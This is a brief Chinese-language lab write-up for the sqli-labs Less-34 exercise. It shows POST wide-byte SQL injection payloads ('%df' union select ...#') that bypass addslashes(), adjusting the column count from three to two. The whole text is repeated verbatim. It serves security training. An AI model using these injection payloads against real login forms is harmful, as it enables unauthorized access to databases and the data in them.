【sqli-labs】 less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)
还是宽字节注入,POST版本的
uname=1&passwd=1%df' union select 1,2,3#
提交报错
列名不匹配,改一下就好了
uname=1&passwd=1%df' union select 1,2#
看一下源码,果然只select了两个字段
还是宽字节注入,POST版本的
uname=1&passwd=1%df' union select 1,2,3#
提交报错
列名不匹配,改一下就好了
uname=1&passwd=1%df' union select 1,2#
看一下源码,果然只select了两个字段